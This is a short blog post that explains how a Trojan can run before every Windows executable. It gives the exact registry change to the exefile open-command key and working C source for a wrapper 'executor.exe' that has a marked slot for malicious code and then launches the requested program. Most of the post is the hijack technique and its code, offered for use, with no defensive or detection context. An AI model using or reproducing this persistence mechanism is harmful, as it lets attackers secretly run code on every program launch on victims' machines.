Execute Trojan exe before every executable

Someone asked me about a virus on a machine that altered the registry to execute itself every time another executable was opened. I explained that this was relatively trivial to do and thought I should back it up with some source code.

First piece is how do we tell windows to launch an exe before it loads the desired program. This is actually accomplished with a simple registry edit. Change the following key
HKEY_CLASSES_ROOT\exefile\shell\open\command
from: “%1” %*
to: c:\executor.exe “%1” %*

Then our executor.exe just needs to take the arguments passed to it and execute that after performing it’s malicious functions. Here is a skeleton, but functional implementation of executor.exe

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

#define WIN32_LEAN_AND_MEAN

int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance,
LPSTR lpCmdLine, int nCmdShow )
{

STARTUPINFO si;
PROCESS_INFORMATION pi;

ZeroMemory( &si, sizeof(si) );
si.cb = sizeof(si);
ZeroMemory( &pi, sizeof(pi) );

//MessageBox (NULL, lpCmdLine, “HelloMsg”, 0) ;

// Malicious code here
// Check for

CreateProcess( NULL, lpCmdLine, NULL, NULL, 0, 0, NULL, NULL, &si, &pi);

}

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: